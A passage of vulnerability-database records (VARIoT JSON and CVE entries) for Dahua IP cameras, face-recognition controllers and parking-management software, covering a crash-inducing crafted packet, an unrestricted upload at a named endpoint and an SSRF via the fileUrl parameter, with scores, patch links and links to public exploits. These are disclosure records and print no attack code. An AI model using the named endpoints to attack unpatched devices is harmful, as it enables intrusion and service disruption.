                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hfw2831t-as-s2:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hfw2831t-zs-s2_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "2022-04",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hfw2831t-zs-s2:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hfw2831t-zas-s2_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "2022-04",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hfw2831t-zas-s2:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hfw2831s-s-s2_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "2022-04",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hfw2831s-s-s2:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hfw2439m-as-led-b-s2_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "2022-04",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hfw2439m-as-led-b-s2:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hfw2239m-as-led-b-s2_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "2022-04",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hfw2239m-as-led-b-s2:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hfw2439s-sa-led-s2_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "2022-04",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hfw2439s-sa-led-s2:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hfw2239s-sa-led-s2_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "2022-04",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hfw2239s-sa-led-s2:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:asi7213x-t1_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "2021-09",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:asi7213x-t1:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:asi7223x-a-t1_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "2021-09",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:asi7223x-a-t1:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:asi7223x-a_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "2021-09",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:asi7223x-a:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:asi7213x_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "2021-09",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:asi7213x:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2022-30560"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Nozomi Networks reported these vulnerabilities to CISA.",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202206-2720"
          }
        ],
        "trust": 0.6
      },
      "cve": "CVE-2022-30560",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "acInsufInfo": false,
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "NVD",
                "availabilityImpact": "PARTIAL",
                "baseScore": 5.8,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 8.6,
                "impactScore": 4.9,
                "integrityImpact": "NONE",
                "obtainAllPrivilege": false,
                "obtainOtherPrivilege": false,
                "obtainUserPrivilege": false,
                "severity": "MEDIUM",
                "trust": 1.0,
                "userInteractionRequired": false,
                "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:P",
                "version": "2.0"
              },
              {
                "acInsufInfo": null,
                "accessComplexity": "Medium",
                "accessVector": "Network",
                "authentication": "None",
                "author": "NVD",
                "availabilityImpact": "Partial",
                "baseScore": 5.8,
                "confidentialityImpact": "Partial",
                "exploitabilityScore": null,
                "id": "CVE-2022-30560",
                "impactScore": null,
                "integrityImpact": "None",
                "obtainAllPrivilege": null,
                "obtainOtherPrivilege": null,
                "obtainUserPrivilege": null,
                "severity": "Medium",
                "trust": 0.8,
                "userInteractionRequired": null,
                "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:P",
                "version": "2.0"
              },
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "CNVD",
                "availabilityImpact": "PARTIAL",
                "baseScore": 5.8,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 8.6,
                "id": "CNVD-2022-60683",
                "impactScore": 4.9,
                "integrityImpact": "NONE",
                "severity": "MEDIUM",
                "trust": 0.6,
                "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:P",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "HIGH",
                "attackVector": "NETWORK",
                "author": "NVD",
                "availabilityImpact": "HIGH",
                "baseScore": 7.4,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 2.2,
                "impactScore": 5.2,
                "integrityImpact": "NONE",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:H",
                "version": "3.1"
              },
              {
                "attackComplexity": "High",
                "attackVector": "Network",
                "author": "NVD",
                "availabilityImpact": "High",
                "baseScore": 7.4,
                "baseSeverity": "High",
                "confidentialityImpact": "High",
                "exploitabilityScore": null,
                "id": "CVE-2022-30560",
                "impactScore": null,
                "integrityImpact": "None",
                "privilegesRequired": "None",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "NVD",
                "id": "CVE-2022-30560",
                "trust": 1.8,
                "value": "HIGH"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2022-60683",
                "trust": 0.6,
                "value": "MEDIUM"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202206-2720",
                "trust": 0.6,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2022-60683"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-012804"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-30560"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202206-2720"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "When an attacker obtaining the administrative account and password, or through a man-in-the-middle attack, the attacker could send a specified crafted packet to the vulnerable interface then lead the device to crash. ipc-hdbw2431e-s-s2 firmware, ipc-hdbw2831e-s-s2 firmware, ipc-hdbw2230e-s-s2 firmware etc. Dahua Technology Co., Ltd There are unspecified vulnerabilities in the product.Information is obtained and service operation is interrupted (DoS) It may be in a state. Dahua IPC-HFW2XXX, etc. are all products of China Dahua (Dahua) company. Dahua IPC-HFW2XXX is an IP camera. Dahua IPC-HDBW2XXX is a series of cameras. Dahua ASI7XXXX is a series of face recognition access controller",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2022-30560"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-012804"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2022-60683"
          },
          {
            "db": "VULMON",
            "id": "CVE-2022-30560"
          }
        ],
        "trust": 2.25
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2022-30560",
            "trust": 3.9
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-012804",
            "trust": 0.8
          },
          {
            "db": "CNVD",
            "id": "CNVD-2022-60683",
            "trust": 0.6
          },
          {
            "db": "ICS CERT",
            "id": "ICSA-22-193-01",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202206-2720",
            "trust": 0.6
          },
          {
            "db": "VULMON",
            "id": "CVE-2022-30560",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2022-60683"
          },
          {
            "db": "VULMON",
            "id": "CVE-2022-30560"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-012804"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-30560"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202206-2720"
          }
        ]
      },
      "id": "VAR-202206-2212",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2022-60683"
          }
        ],
        "trust": 1.39166665
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "IoT"
            ],
            "sub_category": null,
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2022-60683"
          }
        ]
      },
      "last_update_date": "2023-12-18T11:51:39.825000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "Patch for Denial of Service Vulnerabilities in Several Dahua Products",
            "trust": 0.6,
            "url": "https://www.cnvd.org.cn/patchinfo/show/347711"
          },
          {
            "title": "Multiple Dahua Product code issue vulnerability fixes",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=200882"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2022-60683"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202206-2720"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "NVD-CWE-noinfo",
            "trust": 1.0
          },
          {
            "problemtype": "Lack of information (CWE-noinfo) [NVD evaluation ]",
            "trust": 0.8
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-012804"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-30560"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.5,
            "url": "https://www.dahuasecurity.com/support/cybersecurity/details/1017"
          },
          {
            "trust": 1.2,
            "url": "https://cxsecurity.com/cveshow/cve-2022-30560/"
          },
          {
            "trust": 0.8,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2022-30560"
          },
          {
            "trust": 0.6,
            "url": "https://us-cert.cisa.gov/ics/advisories/icsa-22-193-01"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2022-60683"
          },
          {
            "db": "VULMON",
            "id": "CVE-2022-30560"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-012804"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-30560"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202206-2720"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "CNVD",
            "id": "CNVD-2022-60683"
          },
          {
            "db": "VULMON",
            "id": "CVE-2022-30560"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-012804"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-30560"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202206-2720"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2022-08-31T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2022-60683"
          },
          {
            "date": "2022-06-28T00:00:00",
            "db": "VULMON",
            "id": "CVE-2022-30560"
          },
          {
            "date": "2023-09-01T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2022-012804"
          },
          {
            "date": "2022-06-28T14:15:08.087000",
            "db": "NVD",
            "id": "CVE-2022-30560"
          },
          {
            "date": "2022-06-28T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202206-2720"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2022-08-31T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2022-60683"
          },
          {
            "date": "2022-06-28T00:00:00",
            "db": "VULMON",
            "id": "CVE-2022-30560"
          },
          {
            "date": "2023-09-01T08:16:00",
            "db": "JVNDB",
            "id": "JVNDB-2022-012804"
          },
          {
            "date": "2022-07-13T17:38:30.007000",
            "db": "NVD",
            "id": "CVE-2022-30560"
          },
          {
            "date": "2022-07-29T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202206-2720"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202206-2720"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "plural \u00a0Dahua\u00a0Technology\u00a0Co.,\u00a0Ltd\u00a0 Product vulnerabilities",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-012804"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "code problem",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202206-2720"
          }
        ],
        "trust": 0.6
      }
    }

    CVE-2023-3836 (GCVE-0-2023-3836)

    Vulnerability from nvd – Published: 2023-07-22 18:00 – Updated: 2024-08-02 07:08
    VLAI Shadowserver KEVIntel
    Title
    Dahua Smart Park Management unrestricted upload
    Summary
    A vulnerability classified as critical was found in Dahua Smart Park Management up to 20230713. This vulnerability affects unknown code of the file /emap/devicePoint_addImgIco?hasSubsystem=true. The manipulation of the argument upload leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-235162 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
    CWE
    Assigner
    References
    URL Tags
    https://vuldb.com/?id.235162 vdb-entrytechnical-description
    https://vuldb.com/?ctiid.235162 signaturepermissions-required
    https://github.com/qiuhuihk/cve/blob/main/upload.md exploit
    Impacted products
    Credits
    qiuhui (VulDB User)
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "providerMetadata": {
              "dateUpdated": "2024-08-02T07:08:50.600Z",
              "orgId": "af854a3a-2127-422b-91ae-364da2661108",
              "shortName": "CVE"
            },
            "references": [
              {
                "tags": [
                  "vdb-entry",
                  "technical-description",
                  "x_transferred"
                ],
                "url": "https://vuldb.com/?id.235162"
              },
              {
                "tags": [
                  "signature",
                  "permissions-required",
                  "x_transferred"
                ],
                "url": "https://vuldb.com/?ctiid.235162"
              },
              {
                "tags": [
                  "exploit",
                  "x_transferred"
                ],
                "url": "https://github.com/qiuhuihk/cve/blob/main/upload.md"
              }
            ],
            "title": "CVE Program Container"
          }
        ],
        "cna": {
          "affected": [
            {
              "product": "Smart Park Management",
              "vendor": "Dahua",
              "versions": [
                {
                  "status": "affected",
                  "version": "20230713"
                }
              ]
            }
          ],
          "credits": [
            {
              "lang": "en",
              "type": "analyst",
              "value": "qiuhui (VulDB User)"
            }
          ],
          "descriptions": [
            {
              "lang": "en",
              "value": "A vulnerability classified as critical was found in Dahua Smart Park Management up to 20230713. This vulnerability affects unknown code of the file /emap/devicePoint_addImgIco?hasSubsystem=true. The manipulation of the argument upload leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-235162 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way."
            },
            {
              "lang": "de",
              "value": "In Dahua Smart Park Management bis 20230713 wurde eine Schwachstelle entdeckt. Sie wurde als kritisch eingestuft. Betroffen ist eine unbekannte Verarbeitung der Datei /emap/devicePoint_addImgIco?hasSubsystem=true. Durch Manipulation des Arguments upload mit unbekannten Daten kann eine unrestricted upload-Schwachstelle ausgenutzt werden. Der Angriff kann \u00fcber das Netzwerk passieren. Der Exploit steht zur \u00f6ffentlichen Verf\u00fcgung."
            }
          ],
          "metrics": [
            {
              "cvssV3_1": {
                "baseScore": 6.3,
                "baseSeverity": "MEDIUM",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
                "version": "3.1"
              }
            },
            {
              "cvssV3_0": {
                "baseScore": 6.3,
                "baseSeverity": "MEDIUM",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
                "version": "3.0"
              }
            },
            {
              "cvssV2_0": {
                "baseScore": 6.5,
                "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
                "version": "2.0"
              }
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "cweId": "CWE-434",
                  "description": "CWE-434 Unrestricted Upload",
                  "lang": "en",
                  "type": "CWE"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2023-10-24T06:25:47.211Z",
            "orgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
            "shortName": "VulDB"
          },
          "references": [
            {
              "tags": [
                "vdb-entry",
                "technical-description"
              ],
              "url": "https://vuldb.com/?id.235162"
            },
            {
              "tags": [
                "signature",
                "permissions-required"
              ],
              "url": "https://vuldb.com/?ctiid.235162"
            },
            {
              "tags": [
                "exploit"
              ],
              "url": "https://github.com/qiuhuihk/cve/blob/main/upload.md"
            }
          ],
          "timeline": [
            {
              "lang": "en",
              "time": "2023-07-21T00:00:00.000Z",
              "value": "Advisory disclosed"
            },
            {
              "lang": "en",
              "time": "2023-07-21T00:00:00.000Z",
              "value": "CVE reserved"
            },
            {
              "lang": "en",
              "time": "2023-07-21T02:00:00.000Z",
              "value": "VulDB entry created"
            },
            {
              "lang": "en",
              "time": "2023-08-15T21:58:00.000Z",
              "value": "VulDB entry last update"
            }
          ],
          "title": "Dahua Smart Park Management unrestricted upload"
        }
      },
      "cveMetadata": {
        "assignerOrgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
        "assignerShortName": "VulDB",
        "cveId": "CVE-2023-3836",
        "datePublished": "2023-07-22T18:00:05.786Z",
        "dateReserved": "2023-07-21T20:50:50.266Z",
        "dateUpdated": "2024-08-02T07:08:50.600Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }

    CVE-2023-3121 (GCVE-0-2023-3121)

    Vulnerability from nvd – Published: 2023-06-06 11:00 – Updated: 2024-08-02 06:48
    VLAI
    Title
    Dahua Smart Parking Management image server-side request forgery
    Summary
    A vulnerability has been found in Dahua Smart Parking Management up to 20230528 and classified as problematic. This vulnerability affects unknown code of the file /ipms/imageConvert/image. The manipulation of the argument fileUrl leads to server-side request forgery. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-230800. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
    CWE
    • CWE-918 - Server-Side Request Forgery
    Assigner
    References
    URL Tags
    https://vuldb.com/?id.230800 vdb-entrytechnical-description
    https://vuldb.com/?ctiid.230800 signaturepermissions-required
    https://github.com/RCEraser/cve/blob/main/DaHua..md exploit
    Impacted products
    Credits
    RCEraser (VulDB User)
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "providerMetadata": {
              "dateUpdated": "2024-08-02T06:48:07.341Z",
              "orgId": "af854a3a-2127-422b-91ae-364da2661108",
              "shortName": "CVE"
            },
            "references": [
              {
                "tags": [
                  "vdb-entry",
                  "technical-description",
                  "x_transferred"
                ],
                "url": "https://vuldb.com/?id.230800"
              },
              {
                "tags": [
                  "signature",
                  "permissions-required",
                  "x_transferred"
                ],
                "url": "https://vuldb.com/?ctiid.230800"
              },
              {
                "tags": [
                  "exploit",
                  "x_transferred"
                ],
                "url": "https://github.com/RCEraser/cve/blob/main/DaHua..md"
              }
            ],
            "title": "CVE Program Container"
          }
        ],
        "cna": {
          "affected": [
            {
              "product": "Smart Parking Management",
              "vendor": "Dahua",
              "versions": [
                {
                  "status": "affected",
                  "version": "20230528"
                }
              ]
            }
          ],
          "credits": [
            {
              "lang": "en",
              "type": "analyst",
              "value": "RCEraser (VulDB User)"
            }
          ],
          "descriptions": [
            {
              "lang": "en",
              "value": "A vulnerability has been found in Dahua Smart Parking Management up to 20230528 and classified as problematic. This vulnerability affects unknown code of the file /ipms/imageConvert/image. The manipulation of the argument fileUrl leads to server-side request forgery. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-230800. NOTE: The vendor was contacted early about this disclosure but did not respond in any way."
            },
            {
              "lang": "de",
              "value": "In Dahua Smart Parking Management bis 20230528 wurde eine problematische Schwachstelle gefunden. Es geht um eine nicht n\u00e4her bekannte Funktion der Datei /ipms/imageConvert/image. Durch das Beeinflussen des Arguments fileUrl mit unbekannten Daten kann eine server-side request forgery-Schwachstelle ausgenutzt werden. Der Exploit steht zur \u00f6ffentlichen Verf\u00fcgung."
            }
          ],
          "metrics": [
            {
              "cvssV3_1": {
                "baseScore": 3.5,
                "baseSeverity": "LOW",
                "vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
                "version": "3.1"
              }
            },
            {
              "cvssV3_0": {
                "baseScore": 3.5,
                "baseSeverity": "LOW",
                "vectorString": "CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
                "version": "3.0"
              }
            },
            {
              "cvssV2_0": {
                "baseScore": 2.7,
                "vectorString": "AV:A/AC:L/Au:S/C:P/I:N/A:N",
                "version": "2.0"
              }
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "cweId": "CWE-918",
                  "description": "CWE-918 Server-Side Request Forgery",
                  "lang": "en",
                  "type": "CWE"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2023-10-23T12:43:09.475Z",
            "orgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
            "shortName": "VulDB"
          },
          "references": [
            {
              "tags": [
                "vdb-entry",
